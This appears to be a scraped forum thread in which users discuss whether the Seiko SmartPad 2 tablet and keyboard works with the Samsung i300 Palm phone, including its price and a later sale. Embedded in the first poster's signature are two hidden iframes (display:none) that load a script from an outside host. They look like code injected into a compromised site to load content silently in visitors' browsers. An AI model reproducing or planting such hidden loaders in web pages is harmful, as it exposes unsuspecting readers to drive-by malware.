+ Reply to Thread

Thread: SmartPad2?

SmartPad2?

Saw an interesting accessory at Best Buy today: Smartpad 2 by Seiko (see www.seikosmart.com for pics and info).

The item (a large leather zip-up binder) contains a smart pad, pen and keyboard, all operated by a built-in IR port.

I have no idea if it works with Samsung --- though every other Palm was listed --- and it's extremely expensive ($199!) but wow, does it look great. And if it works, there's the answer to the keyboard and a lot more. Has anyone tried it?

I'm going to call them tomorrow (800-757-1011) to see if they've got a driver for us, or one on the way, and I'll report back what they tell me.

Lisa
    www.writerscollective.org
    No shared royalties - ever.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

someone at work has one of these..... no reason why it woudn't work with the I300, since its all IR based..... although I didn't try it out with my I300...

the keyboad that it comes with is ok, but not like the standard keyboard you might be thinking about.... to use the keyboard you have to use the speical pen they include with the smartpad... you can't use your fingers to type on it....

Brooks

Administrator

Arrow

yeah keep us posted... seems like it should work for the i300, but this is a hybrid Palm Pilot with built-in modem, so it can go either way..

id be surprised if they (seiko) have tested it with the i300 (or the 6035 for that matter)..

smartpad2

Brooks wrote:

>> the keyboad that it comes with is ok, but not like the standard keyboard you might be thinking about.... to use the keyboard you have to use the speical pen they include with the smartpad... you can't use your fingers to type on it.... <<

I went back and looked at the picture again (this time *after* a cup of coffee) -- and dang if you aren't right. Well, whether it works with the i300 or not, it sure isn't worth an extra $200 bucks for a larger pecking area. Guess I'll have to wait a while longer for a working keyboard, but it sure would've been nice to have it all in one neat package like that.

Thanks for the correction....

Lisa
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

Administrator

Arrow

yeah alittle let down... but its still kinda neat..

hey fikse, can you try it out and see if it will work for the i300? i like gadgets and might still jump on it!

Marc does the 6035 have the same port as the I300? Wondering if that new keyboard is compatible.

Administrator

Arrow

if your mean the physical connector? then no, but if you mean Ir..well, they are in different places, the Ir button on the 6035 acts as the backlight button and its directly on top. i wqould imagine they do the same protocools though...

SmartPad - $49 today!

http://www.us.buy.com/retail/DOTD/DO...4&sku=70008271

90 Left

Buy.com's deal of the day, today, 5/17/2002.

I just bought one myself.

Pffffft...

when you have it tell us your experience how it is with the I300.
    I might buy it for school!

PS. I think this Smartpad is version 1, not 2
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Smart Pad 2

I have used it for a few months. Works pretty well.
    Only major issue I have is that after 10 minutes or so the phone will go into standby, shut the screen down, and the smartpad will stop capturing notes. Its really just a digitizing tablet for a palm.
    Good for sketches etc.